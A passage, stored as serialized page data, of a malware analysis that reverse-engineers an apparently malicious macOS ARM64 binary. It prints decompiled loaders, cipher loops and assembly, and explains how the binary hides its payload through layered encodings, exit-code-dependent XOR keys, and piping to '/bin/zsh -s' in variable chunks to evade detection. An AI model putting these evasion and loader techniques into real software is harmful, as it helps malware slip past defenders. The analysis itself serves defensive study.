algorithm.",[2489,3166,3167],{"style":2491},[2952,3168,3169,3172,3174,3177,1658,3179,2972,3181,3184,3185,3187,3188,3190,3191,3193,3194,3197,3198],{},[919,3170,3171],{"style":2956},"// FUN_100087c08 @ 0x100087c08",[2959,3173],{},[919,3175,3176],{"style":2956},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[919,3178,2967],{"style":2966},[919,3180,3144],{"style":2970},[919,3182,3183],{"style":2966},"long"," *param_1)\n{\n  ",[919,3186,3183],{"style":2966}," *plVar1;\n  ",[919,3189,2967],{"style":2966}," *pvVar2;\n  ",[919,3192,3183],{"style":2966}," lVar3;\n  ",[919,3195,3196],{"style":2966},"uint"," *puVar4;\n",[809,3199,3200,3201,2972,3204,3207,3208,3213,3216,3217,3207,3219,3222,3224,3227,3228,883,3231,3207,3234,3237,3238,3240,3241,3005,3243,3245,3246,3249,3250,3253,3254,3256,3257,3260,3261,3264,3265,3005,3268,3270,3271,3274,3275,3278,3280,3283,3284,3005,3286,3288,3289,3291,3292,3294,3295,3300,3301,3304,3305,3310,3311,3314,3315,3317,3318,3323,3324,3326,3327,3329,3330,3333,3334,3337,3338,3207,3340,3343,3345,3348,3349,3021],{},"pvVar2 = ",[919,3202,3203],{"style":2970},"operator_new",[919,3205,3206],{"style":2991},"0x2d0","); ",[919,3209,3210,3211],{"style":2956},"// allocate 720 bytes (60 triplets × 12)",[2959,3212],{},[919,3214,3215],{"style":2970},"_memcpy","(pvVar2, &DAT_1006292cc, ",[919,3218,3206],{"style":2991},[919,3220,3221],{"style":2956},"// copy encoded triplets from __const",[2959,3223],{},[919,3225,3226],{"style":2970},"FUN_1000a0840","(param_1, ",[919,3229,3230],{"style":2991},"0x3c",[919,3232,3233],{"style":2991},"0",[919,3235,3236],{"style":2956},"// init 60-char output buffer","\nlVar3 = ",[919,3239,3233],{"style":2991},";\npuVar4 = (",[919,3242,3196],{"style":2966},[919,3244,3183],{"style":2966},")pvVar2 + ",[919,3247,3248],{"style":2991},"8",");\n",[919,3251,3252],{"style":2966},"do"," {\nplVar1 = (",[919,3255,3183],{"style":2966}," _)_param_1;\n",[919,3258,3259],{"style":2966},"if"," (-",[919,3262,3263],{"style":2991},"1"," \u003C _(",[919,3266,3267],{"style":2966},"char",[919,3269,3183],{"style":2966},")param_1 + ",[919,3272,3273],{"style":2991},"0x17",")) {\nplVar1 = param_1;\n}\n",[919,3276,3277],{"style":2956},"// THE DECODE FORMULA, one character per triplet:",[2959,3279],{},[919,3281,3282],{"style":2956},"// char = ((b _ 3) XOR a) >> shift) - b","\n_(",[919,3285,3267],{"style":2966},[919,3287,3183],{"style":2966},")plVar1 + lVar3) =\n(",[919,3290,3267],{"style":2966},")((",[919,3293,2978],{"style":2966},")(puVar4",[919,3296,3297,3298],{},"-",[919,3299,3263],{"style":2991}," * ",[919,3302,3303],{"style":2991},"3"," ^ puVar4",[919,3306,3297,3307],{},[919,3308,3309],{"style":2991},"2",") >> (*puVar4 & ",[919,3312,3313],{"style":2991},"0x1f",")) - (",[919,3316,3267],{"style":2966},")puVar4",[919,3319,3320],{},[919,3321,3322],{"style":2991},"-1",";\nlVar3 = lVar3 + ",[919,3325,3263],{"style":2991},";\npuVar4 = puVar4 + ",[919,3328,3303],{"style":2991},"; ",[919,3331,3332],{"style":2956},"// advance 12 bytes — next triplet","\n} ",[919,3335,3336],{"style":2966},"while"," (lVar3 != ",[919,3339,3230],{"style":2991},[919,3341,3342],{"style":2956},"// loop exactly 60 times",[2959,3344],{},[919,3346,3347],{"style":2970},"operator_delete","(pvVar2);\n",[919,3350,3020],{"style":2966},[809,3352,3353],{},"And the corresponding ARM64 assembly, each instruction maps directly to one operation in the formula:",[2489,3355,3356],{"style":2491},[2493,3357,3360],{"className":3358,"code":3359,"language":987},[2496],"100087c48:  add x9,x20,#0x8\n100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11\n100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n                                       ; (compiler avoids MUL instruction)\n100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a\n100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12\n100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved\n100087c60:  sub w10,w10,w11           ; subtract b — final decoded character\n100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer\n100087c78:  add x8,x8,#0x1\n100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60\n100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded\n",[2499,3361,3359],{"__ignoreMap":927},[809,3363,3364,3365,3368,3369,3372],{},"One detail worth noting: the multiplication ",[2499,3366,3367],{},"b × 3"," is implemented as ",[2499,3370,3371],{},"add w12, w11, w11, LSL #1",", a shift-and-add that avoids a multiplication instruction entirely. This is a classic compiler optimisation that also makes the code harder to pattern-match in signature databases.",[809,3374,3375],{},"The complete decode formula:",[2489,3377,3378],{"style":2491},[2493,3379,3382],{"className":3380,"code":3381,"language":987},[2496],"char = ASR( (b × 3) XOR a, shift ) − b\n",[2499,3383,3381],{"__ignoreMap":927},[809,3385,1962,3386,3389,3390,3393,3394,3397],{},[2499,3387,3388],{},"ASR"," (arithmetic shift right) is critical. It preserves the sign bit. If the intermediate result of ",[2499,3391,3392],{},"(b×3) XOR a"," is negative, which it frequently is, a logical shift would produce a different result entirely. This is intentional, and means that simply reimplementing the formula with ",[2499,3395,3396],{},">>"," in a higher-level language will silently produce wrong output unless the signed arithmetic is handled correctly.",[809,3399,3400,3401,3403,3404,3406,3407,3410],{},"The 56-character variant ",[2499,3402,3156],{}," is structurally identical, operating on ",[2499,3405,3163],{}," with a loop limit of ",[2499,3408,3409],{},"0x38",". Both functions were confirmed live from Ghidra during this analysis.",[2462,3412],{},[897,3414,3416],{"id":3415},"layer-2-hex-string-encoding","Layer 2 — Hex String Encoding",[809,3418,2624],{},[809,3420,3421,3422,3425,3426,3145,3429,3432,3433,3436],{},"The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. The output of a Layer 1 triplet decode is a string of hex pairs: ",[2499,3423,3424],{},"32694e5462...",". This is confirmed by the decoder function ",[2499,3427,3428],{},"FUN_100000dc0",[2499,3430,3431],{},"0x100000dc0",", which implements a hex-decode using a lookup table at ",[2499,3434,3435],{},"DAT_1007bb591",".",[809,3438,3439,3440,3297,3443,883,3446,3297,3449,883,3452,3297,3455,3458],{},"The Ghidra decompile shows a switch statement mapping each hex character (",[2499,3441,3442],{},"0x30",[2499,3444,3445],{},"0x39",[2499,3447,3448],{},"0x41",[2499,3450,3451],{},"0x46",[2499,3453,3454],{},"0x61",[2499,3456,3457],{},"0x66",") to its nibble value, assembling output bytes two characters at a time:",[2489,3460,3461],{"style":2491},[2952,3462,3463,3466,3469,3472,3473,3476,3477,3479,3480,1658,3483,3485,3486,3489,3490,895,3493,1658,3495,3498,3499,3329,3502,3504,3505,895,3508,1658,3510,3498,3513,3329,3516,3504,3518,895,3521,895,3524,1658,3526,3485,3528,1658,3530,3498,3532,3329,3535,3537,3538,895,3541,1658,3543,3485,3546,1658,3548,3498,3551,3329,3554,3537,3556,895,3559,1658,3561,3485,3564,1658,3566,3569,3570,3329,3573,3537,3575,895,3578,1658,3580,3485,3583,1658,3585,3588,3589,3329,3592,3537,3594,895,3597,1658,3599,3485,3602,1658,3604,3498,3607,3329,3610,3537,3612,895,3615,1658,3617,3485,3619,1658,3621,3498,3623,3329,3626,3537,3628,3631,3632,3635,3636,3476,3639,3641,3642,3644,3645,3648],{},[919,3464,3465],{"style":2956},"// FUN_100000dc0 @ 0x100000dc0",[919,3467,3468],{"style":2956},"// Hex decoder, processes input two characters per output byte",[919,3470,3471],{"style":2966},"switch","(*(",[919,3474,3475],{"style":2966},"undefined1"," *)((",[919,3478,3183],{"style":2966},")plVar2 + lVar7)) {\n  ",[919,3481,3482],{"style":2966},"case",[919,3484,3442],{"style":2991},": ",[919,3487,3488],{"style":2966},"break",";                  ",[919,3491,3492],{"style":2956},"// '0' → 0x00",[919,3494,3482],{"style":2966},[919,3496,3497],{"style":2991},"0x31",": bVar9 = ",[919,3500,3501],{"style":2991},"0x10",[919,3503,3488],{"style":2966},";   ",[919,3506,3507],{"style":2956},"// '1' → 0x10",[919,3509,3482],{"style":2966},[919,3511,3512],{"style":2991},"0x32",[919,3514,3515],{"style":2991},"0x20",[919,3517,3488],{"style":2966},[919,3519,3520],{"style":2956},"// '2' → 0x20",[919,3522,3523],{"style":2956},"// ... '3' through '9' ...",[919,3525,3482],{"style":2966},[919,3527,3448],{"style":2991},[919,3529,3482],{"style":2966},[919,3531,3454],{"style":2991},[919,3533,3534],{"style":2991},"0xa0",[919,3536,3488],{"style":2966},";  ",[919,3539,3540],{"style":2956},"// 'A'/'a' → 0xa0",[919,3542,3482],{"style":2966},[919,3544,3545],{"style":2991},"0x42",[919,3547,3482],{"style":2966},[919,3549,3550],{"style":2991},"0x62",[919,3552,3553],{"style":2991},"0xb0",[919,3555,3488],{"style":2966},[919,3557,3558],{"style":2956},"// 'B'/'b' → 0xb0",[919,3560,3482],{"style":2966},[919,3562,3563],{"style":2991},"0x43",[919,3565,3482],{"style":2966},[919,3567,3568],{"style":2991},"99",":   bVar9 = ",[919,3571,3572],{"style":2991},"0xc0",[919,3574,3488],{"style":2966},[919,3576,3577],{"style":2956},"// 'C'/'c' → 0xc0",[919,3579,3482],{"style":2966},[919,3581,3582],{"style":2991},"0x44",[919,3584,3482],{"style":2966},[919,3586,3587],{"style":2991},"100",":  bVar9 = ",[919,3590,3591],{"style":2991},"0xd0",[919,3593,3488],{"style":2966},[919,3595,3596],{"style":2956},"// 'D'/'d' → 0xd0",[919,3598,3482],{"style":2966},[919,3600,3601],{"style":2991},"0x45",[919,3603,3482],{"style":2966},[919,3605,3606],{"style":2991},"0x65",[919,3608,3609],{"style":2991},"0xe0",[919,3611,3488],{"style":2966},[919,3613,3614],{"style":2956},"// 'E'/'e' → 0xe0",[919,3616,3482],{"style":2966},[919,3618,3451],{"style":2991},[919,3620,3482],{"style":2966},[919,3622,3457],{"style":2991},[919,3624,3625],{"style":2991},"0xf0",[919,3627,3488],{"style":2966},[919,3629,3630],{"style":2956},"// 'F'/'f' → 0xf0","\n}\n",[919,3633,3634],{"style":2956},"// Second nibble from lookup table at DAT_1007bb591","\n*(",[919,3637,3638],{"style":2966},"byte",[919,3640,3183],{"style":2966},")pppppppuVar3 + uVar8) =\n    (&DAT_1007bb591)[(",[919,3643,3008],{"style":2966},")uVar4 & ",[919,3646,3647],{"style":2991},"0xff","] | bVar9;\n",[809,3650,3651],{},"The ARM64 assembly drives this with a secondary computed-branch table, effectively implementing a 55-entry jump table for the switch:",[2489,3653,3654],{"style":2491},[2493,3655,3658],{"className":3656,"code":3657,"language":987},[2496],"100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table\n100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68:  br x17                   ; jump — second computed branch in 24 bytes\n",[2499,3659,3657],{"__ignoreMap":927},[809,3661,3662],{},"Two computed branches within a 24-byte window. Static analysis tools struggle badly with this pattern because both targets are unknown at analysis time.",[809,3664,3665],{},"A 137,208-character hex string decodes to 68,604 bytes. These 68,604 bytes then feed Layer 3.",[2462,3667],{},[897,3669,3671],{"id":3670},"layer-3-custom-16-symbol-nibble-alphabet","Layer 3 — Custom 16-Symbol Nibble Alphabet",[809,3673,2624],{},[809,3675,3676],{},"The 68,604 output bytes from Layer 2 use only 16 unique byte values, drawn from two non-contiguous ASCII ranges:",[1648,3678,3679,3727],{},[1652,3680,3681,3684,3685,883,3688,883,3691,883,3694,883,3697,883,3700,883,3703,883,3706,883,3708,883,3711,883,3714,883,3717,883,3720,883,3722,883,3724],{},[2499,3682,3683],{},"0x20-0x2F",": space, ",[2499,3686,3687],{},"!",[2499,3689,3690],{},"\"",[2499,3692,3693],{},"#",[2499,3695,3696],{},"$",[2499,3698,3699],{},"%",[2499,3701,3702],{},"&",[2499,3704,3705],{},"'",[2499,3707,2972],{},[2499,3709,3710],{},")",[2499,3712,3713],{},"*",[2499,3715,3716],{},"+",[2499,3718,3719],{},",",[2499,3721,3297],{},[2499,3723,3436],{},[2499,3725,3726],{},"/",[1652,3728,3729,3485,3732,883,3735,883,3738,883,3741,883,3744,883,3747,883,3750,3753],{},[2499,3730,3731],{},"0x78-0x7F",[2499,3733,3734],{},"x",[2499,3736,3737],{},"y",[2499,3739,3740],{},"z",[2499,3742,3743],{},"{",[2499,3745,3746],{},"|",[2499,3748,3749],{},"}",[2499,3751,3752],{},"~",", DEL",[809,3755,3756],{},"This is a deliberate choice. In a hex editor, these bytes look like whitespace, punctuation, and end-of-ASCII-range characters — they blend into what looks like metadata or padding, not encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also undercount the effective entropy because the byte distribution appears non-random.",[809,3758,3759,3760,3763,3764,3767,3768,3771,3772,3775],{},"Each byte from this alphabet encodes one nibble of the actual payload. The alphabet-to-nibble mapping is applied by the encode/decode function ",[2499,3761,3762],{},"FUN_100000d60",", which we confirmed at ",[2499,3765,3766],{},"0x100000d60",". It chains two sub-functions: ",[2499,3769,3770],{},"FUN_100000b50"," builds an indexed map of the input string's characters, and ",[2499,3773,3774],{},"FUN_100000c34"," walks this map, consuming 6 bits per step and accumulating output bytes 8 bits at a time:",[2489,3777,3778],{"style":2491},[2952,3779,3780,3783,3784,3786,3787,3789,3790,3792,3793,3796,3797,895,3800,3802,3803,3805,3806,2852,3809,3811,3812,3815,3816,3818,3819,2852,3822,3824,3825,3828,3829,3832,3833,3835,3836,3839,3840,3842,3843,3476,3846,3848,3849,3851,3852,3854],{},[919,3781,3782],{"style":2956},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[919,3785,3233],{"style":2991},";\n",[919,3788,3252],{"style":2966}," {\n  local_52 = *(",[919,3791,3475],{"style":2966}," *)puVar4;\n  lVar3 = ",[919,3794,3795],{"style":2970},"FUN_1000a078c","(param_3, &local_52);  ",[919,3798,3799],{"style":2956},"// look up nibble value",[919,3801,3259],{"style":2966}," (lVar3 == ",[919,3804,3233],{"style":2991},") {\n    ",[919,3807,3808],{"style":2956},"// character not in alphabet, treat as raw",[919,3810,3795],{"style":2970},"(param_3, &local_51);\n  } ",[919,3813,3814],{"style":2966},"else"," {\n    iVar5 = iVar5 + ",[919,3817,3012],{"style":2991},";           ",[919,3820,3821],{"style":2956},"// accumulate 4 bits",[919,3823,3336],{"style":2966}," (",[919,3826,3827],{"style":2991},"7"," \u003C iVar5) {\n      std::string::",[919,3830,3831],{"style":2970},"push_back","((",[919,3834,3267],{"style":2966},")param_1);  ",[919,3837,3838],{"style":2956},"// emit byte when 8+ bits ready","\n      iVar5 = iVar5 + -",[919,3841,3248],{"style":2991},";\n    }\n  }\n  puVar4 = (",[919,3844,3845],{"style":2966},"undefined8",[919,3847,3183],{"style":2966},")puVar4 + ",[919,3850,3263],{"style":2991},");\n} ",[919,3853,3336],{"style":2966}," (puVar4 != puVar1);\n",[809,3856,3857],{},"The 34,302 bytes that emerge from this pass are 99.7% printable ASCII, the payload at this stage looks like a large shell script or configuration blob to a superficial inspection.",[2462,3859],{},[897,3861,3863],{"id":3862},"layer-4-compile-time-string-obfuscation","Layer 4, Compile-Time String Obfuscation",[809,3865,2624],{},[809,3867,3868],{},"Short strings used internally are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory, they are consumed by the next operation and then the buffer is freed. At no point is a decoded string visible in the binary's static data sections.",[809,3870,3871,3872,3875],{},"The string hash function ",[2499,3873,3874],{},"FUN_100000730"," provides a secondary obfuscation layer for string comparisons. Rather than comparing strings directly, which would leave plaintext in memory for pattern-matching, the binary computes and compares integer hashes:",[2489,3877,3878],{"style":2491},[2952,3879,3880,3883,3886,1658,3888,2972,3890,3184,3892,3894,3895,3898,3899,895,3902,895,3905,3908,3909,3911,3912,3914,3915,3917,3918,3537,3921,3924,3925,3927,3928,3930],{},[919,3881,3882],{"style":2956},"// FUN_100000730 @ 0x100000730",[919,3884,3885],{"style":2956},"// FNV-style string hash, avoids plaintext string comparisons",[919,3887,2978],{"style":2966},[919,3889,3874],{"style":2970},[919,3891,3267],{"style":2966},[919,3893,2978],{"style":2966}," iVar4 = ",[919,3896,3897],{"style":2991},"0x19a8",";    ",[919,3900,3901],{"style":2956},"// FNV offset basis (modified)",[919,3903,3904],{"style":2956},"// ...",[919,3906,3907],{"style":2966},"for"," (; uVar3 != ",[919,3910,3233],{"style":2991},"; uVar3 = uVar3 - ",[919,3913,3263],{"style":2991},") {\n    iVar4 = (",[919,3916,2978],{"style":2966},")*pcVar1 + iVar4 * -",[919,3919,3920],{"style":2991},"0x7fb91be3",[919,3922,3923],{"style":2956},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[919,3926,3263],{"style":2991},";\n  }\n  ",[919,3929,3020],{"style":2966}," iVar4;\n}\n",[809,3932,3933],{},"The ARM64 implementation replaces the multiply with a fused multiply-add:",[2489,3935,3936],{"style":2491},[2493,3937,3940],{"className":3938,"code":3939,"language":987},[2496],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[2499,3941,3939],{"__ignoreMap":927},[809,3943,3944],{},"This means that even comparing two strings inside the binary never produces a branch that a debugger can intercept cleanly at the string level — only at the hash level.",[2462,3946],{},[897,3948,3950],{"id":3949},"layer-5-dual-instance-custom-stream-cipher","Layer 5 — Dual-Instance Custom Stream Cipher",[809,3952,2624],{},[809,3954,3955,3956,3959],{},"This is where the obfuscation architecture becomes genuinely unusual. There are not one but ",[1655,3957,3958],{},"two separate cipher instances"," running in the binary, each with a different hardcoded lookup table and a different starting counter. Both use the same algorithm structure, but they produce different output alphabets for different parts of the payload pipeline.",[809,3961,3962,3965,3966,3145,3969,3972],{},[1655,3963,3964],{},"Instance A"," — ",[2499,3967,3968],{},"FUN_10007ab34",[2499,3970,3971],{},"0x10007ab34",":",[2489,3974,3975],{"style":2491},[2952,3976,3977,3980,3981,3786,3984,3986,3987,3476,3989,3991,3992,3994,3995,3476,3997,3999,4000,4002,4003,3476,4005,4007,4008,4010,4011,4014,4015,4017,4018,4020],{},[919,3978,3979],{"style":2956},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[919,3982,3983],{"style":2991},"0x4c",[919,3985,3252],{"style":2966}," {\n  bVar2 = *(",[919,3988,3638],{"style":2966},[919,3990,3183],{"style":2966},")local_e0 +\n          ((",[919,3993,3008],{"style":2966},")(*(",[919,3996,3638],{"style":2966},[919,3998,3183],{"style":2966},")local_c8 + uVar5) ^ uVar6) & ",[919,4001,3647],{"style":2991},"));\n  *(",[919,4004,3638],{"style":2966},[919,4006,3183],{"style":2966},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[919,4009,2978],{"style":2966},")uVar5 + (uVar6 ^ bVar2);  ",[919,4012,4013],{"style":2956},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[919,4016,3263],{"style":2991},";\n} ",[919,4019,3336],{"style":2966}," (uVar7 != uVar5);\n",[809,4022,4023,883,4026,3145,4029,3972],{},[1655,4024,4025],{},"Instance B",[2499,4027,4028],{},"FUN_10007a7e0",[2499,4030,4031],{},"0x10007a7e0",[2489,4033,4034],{"style":2491},[2952,4035,4036,3980,4039,3786,4042,3986,4044,3476,4046,4048,4049,3994,4051,3476,4053,4055,4056,4002,4058,3476,4060,4007,4062,4010,4064,4014,4067,4017,4069,4020],{},[919,4037,4038],{"style":2956},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[919,4040,4041],{"style":2991},"0x9f",[919,4043,3252],{"style":2966},[919,4045,3638],{"style":2966},[919,4047,3183],{"style":2966},")local_c0 +\n          ((",[919,4050,3008],{"style":2966},[919,4052,3638],{"style":2966},[919,4054,3183],{"style":2966},")local_a8 + uVar5) ^ uVar6) & ",[919,4057,3647],{"style":2991},[919,4059,3638],{"style":2966},[919,4061,3183],{"style":2966},[919,4063,2978],{"style":2966},[919,4065,4066],{"style":2956},"// identical counter update formula",[919,4068,3263],{"style":2991},[919,4070,3336],{"style":2966},[809,4072,4073,4074,4076,4077,4079],{},"The algorithm is structurally identical but the starting counter differs (",[2499,4075,3983],{}," vs ",[2499,4078,4041],{},") and the lookup tables are at different memory addresses. Instance A is called from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is called from state 6 to produce the alphabet for the large shell script payload decode.",[809,4081,4082,4083,4086,4087,4090,4091,4094],{},"To be precise about what this cipher is: it is a ",[1655,4084,4085],{},"substitution cipher with a counter-dependent index",". Each output byte is a table lookup where the index is ",[2499,4088,4089],{},"(input_byte XOR counter) & 0xFF",". The counter updates as ",[2499,4092,4093],{},"counter = (i + (counter XOR output)) & 0xFF"," after each byte, meaning each output byte feeds back into determining the next lookup index. This creates a dependency chain across the entire output sequence: you cannot decrypt byte N without having correctly decrypted bytes 0 through N−1. This property makes partial decryption or fault analysis significantly harder.",[809,4096,4097],{},"Neither instance is standard RC4. There is no S-Box initialisation phase and no S-Box swap operation. The lookup tables are static, pre-computed constants baked into the binary at compile time.",[2462,4099],{},[897,4101,4103],{"id":4102},"layer-6-runtime-xor-with-exit-code-dependent-key","Layer 6 — Runtime XOR with Exit-Code Dependent Key",[809,4105,2624],{},[809,4107,4108,4109,4112],{},"The final and most analytically defeating layer applies an in-place XOR transformation to the Stage 2 payload. The XOR key is not hardcoded. It is computed at runtime from the exit code of the ",[1655,4110,4111],{},"first shell payload execution",", meaning it cannot be determined by any form of static analysis. The binary must actually execute, the first shell script must run to completion, and only then does the key exist.",[809,4114,4115],{},"The key derivation sequence in the ARM64 state machine dispatcher:",[2489,4117,4118],{"style":2491},[2493,4119,4122],{"className":4120,"code":4121,"language":987},[2496],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[2499,4123,4121],{"__ignoreMap":927},[809,4125,4126],{},"The XOR loop that processes the Stage 2 payload:",[2489,4128,4129],{"style":2491},[2493,4130,4133],{"className":4131,"code":4132,"language":987},[2496],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[2499,4134,4132],{"__ignoreMap":927},[809,4136,4137,4138,4141,4142,4145,4146,4148],{},"The key is a 16-bit value derived from the exit status byte of the first shell payload, multiplied by ",[2499,4139,4140],{},"0x7f0"," and added to the current value of the state machine's base counter register ",[2499,4143,4144],{},"w26",". The multiplication constant ",[2499,4147,4140],{}," means that even a single-bit difference in the exit code produces a completely different key, there is no exploitable continuity between adjacent key values.",[809,4150,4151],{},"Without executing the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload is permanently opaque to static analysis. This is the single hardest barrier we encountered in this entire analysis.",[2462,4153],{},[819,4155,4157],{"id":4156},"shell-execution-pipes-not-arguments-and-simd-xor","Shell Execution: Pipes, Not Arguments, and SIMD XOR",[809,4159,2484],{},[809,4161,4162,4163,3145,4166,4169],{},"The shell execution function ",[2499,4164,4165],{},"FUN_10000091c",[2499,4167,4168],{},"0x10000091c"," is architecturally the most interesting piece of the binary. It is where everything comes together, the decoded payload, the obfuscated command name, and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.",[897,4171,4173],{"id":4172},"step-1-the-command-name-is-never-in-plaintext","Step 1: The command name is never in plaintext",[809,4175,2624],{},[809,4177,4178,4179,4182,4183,4186,4187,4190,4191,4194],{},"The string ",[2499,4180,4181],{},"/bin/zsh"," does not exist anywhere in the binary. It is stored in the ",[2499,4184,4185],{},"__cstring"," section at ",[2499,4188,4189],{},"0x1007bb5c8"," as the obfuscated bytes ",[2499,4192,4193],{},"\\x01LG@\\x01T]F",". The decoding happens at runtime using a single XOR operation, confirmed directly in the ARM64 assembly:",[2489,4196,4197],{"style":2491},[2493,4198,4201],{"className":4199,"code":4200,"language":987},[2496],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[2499,4202,4200],{"__ignoreMap":927},[809,4204,4205,4206,4209,4210,4212,4213,4216],{},"The XOR key is ",[2499,4207,4208],{},"0x2e",", the ASCII value of ",[2499,4211,3436],{}," (period). The decode is performed in a single ",[2499,4214,4215],{},"eor v0.8B, v0.8B, v1.8B",", an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decode loops will not flag.",[809,4218,4219,4220,883,4223,883,4226,883,4229,4232,4233,4236],{},"The verification is trivial: ",[2499,4221,4222],{},"0x01 XOR 0x2e = 0x2f = /",[2499,4224,4225],{},"0x4c XOR 0x2e = 0x62 = b",[2499,4227,4228],{},"0x47 XOR 0x2e = 0x69 = i",[2499,4230,4231],{},"0x40 XOR 0x2e = 0x6e = n"," — producing ",[2499,4234,4235],{},"/bin"," in the first four bytes.",[897,4238,4240],{"id":4239},"step-2-the-pipe-architecture","Step 2: The pipe architecture",[809,4242,2624],{},[809,4244,4245],{},"After decoding the command name, the function creates an OS pipe and forks:",[2489,4247,4248],{"style":2491},[2493,4249,4252],{"className":4250,"code":4251,"language":987},[2496],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[2499,4253,4251],{"__ignoreMap":927},[809,4255,4256],{},"In the child process:",[2489,4258,4259],{"style":2491},[2493,4260,4263],{"className":4261,"code":4262,"language":987},[2496],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[2499,4264,4262],{"__ignoreMap":927},[809,4266,4267,4268,4271,4272,4275,4276,4278],{},"The child replaces its standard input with the read end of the pipe, then executes ",[2499,4269,4270],{},"/bin/zsh -s",". The shell in ",[2499,4273,4274],{},"-s"," mode reads commands from stdin. From a process monitoring perspective, this process appears as ",[2499,4277,4270],{}," with no arguments — which is indistinguishable from a legitimate interactive shell session.",[897,4280,4282],{"id":4281},"step-3-variable-size-chunk-writes","Step 3: Variable-size chunk writes",[809,4284,2624],{},[809,4286,4287],{},"The parent process writes the decrypted payload to the pipe write end in deliberately variable-sized chunks:",[2489,4289,4290],{"style":2491},[2493,4291,4294],{"className":4292,"code":4293,"language":987},[2496],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[2499,4295,4293],{"__ignoreMap":927},[809,4297,4298,4299,4302,4303,4306,4307,4310,4311,4314],{},"The chunk size formula ",[2499,4300,4301],{},"(remaining_length % 192) + 64"," produces values between 64 and 255 bytes per write call, varying with the remaining payload length. This variable-chunk approach means that the write pattern, visible in kernel event tracing tools like ",[2499,4304,4305],{},"ktrace"," or ",[2499,4308,4309],{},"dtrace",", does not produce a recognisable fixed-size signature. Each 